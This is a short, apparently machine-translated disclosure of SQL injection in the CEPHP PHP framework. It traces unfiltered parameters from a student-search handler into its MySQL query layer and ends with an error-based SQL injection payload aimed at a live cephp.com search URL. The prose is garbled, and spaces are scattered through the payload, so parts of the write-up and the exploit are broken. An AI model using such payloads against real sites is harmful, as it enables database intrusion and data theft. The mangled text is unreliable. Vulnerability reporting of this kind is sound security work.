Http://www.cephp.com/lightweight PHP framework for-degree search. The first one is CEPHP. Injection exists in the mobile testing. The source code is downloaded, and all injection operations involving database operations are found throughout the site. No filtering is performed on the variables. Speechless. 1. Main file demo \ M \ User \ student. php processing means that the parameters are not filtered and brought into the Mdb-> find function for processing. We can see that Mdb, inherited from M_User_Student, will eventually be located in Cemvc \ Db \ MysqlDb. PHP file. The function is as follows: the database query statement is not processed... Injection generates http://www.cephp.com/search/1'%20AND%20 (SELECT % 207552% 20 FROM (SELECT % 20 COUNT (*), CONCAT (0x3a666f613a, (SELECT % 20 (CASE % 20 WHEN % 20 (7552 = 7552) % 20 THEN % 201% 20 ELSE % 200% 20END), 0x3a71777a3a, FLOOR (RAND (0) * 2) x % 20 FROM % 20INFORMATION_SCHEMA.CHARACTER_SETS % 20 GROUP % 20BY % 20x) a) % 20AND % 20 'puww '= 'puww